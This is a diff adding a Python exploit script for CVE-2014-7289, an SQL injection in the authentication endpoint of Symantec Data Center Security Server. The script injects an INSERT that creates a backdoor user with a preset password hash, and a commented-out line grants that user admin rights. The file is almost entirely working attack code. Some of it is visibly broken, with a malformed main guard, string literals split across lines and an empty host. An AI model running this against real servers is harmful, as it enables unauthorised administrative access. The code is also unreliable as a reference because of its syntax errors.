diff --git a/Web_Security/SQLi/CVE-2014-7289_exploit.py b/Web_Security/SQLi/CVE-2014-7289_exploit.py new file mode 100644 index 0000000..9b6839f --- /dev/null +++ b/Web_Security/SQLi/CVE-2014-7289_exploit.py @@ -0,0 +1,43 @@ +#!/bin/env python +# Reference: http://seclists.org/fulldisclosure/2015/Jan/91 + + +import httplib +def send_request(host,data): + params = data + headers = {"AppFire-Format-Version": "1.0", + "AppFire-Charset": "UTF-16LE", + "Content-Type":"application/x-appfire", + "User-Agent":"Java/1.7.0_45", + } + conn = httplib.HTTPSConnection(host) + conn.request("POST", "/sis-ui/authenticate", params, headers) + response = conn.getresponse() + data=response.read() + conn.close() + return response,data + +if __name__ = '__main__' + header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n" + data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, + PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, + PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) + VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', + '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 + 07:13:23', '1', '0', '0', + 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); + -- '' " # add user to USR table + #data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, + ROLERID) VALUES (1504, 1); -- " # add user to admin group + data+="\r\nan=Symantec Data Center Security Server + 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n" + data = data.encode('utf-16le') + + eof_flag="\nEOF_FLAG\n" + header = header %(len(data)) + payload=header+data+eof_flag + + response,data = send_request(":4443",payload) + + print data.decode('utf-16le') + print response.status \ No newline at end of file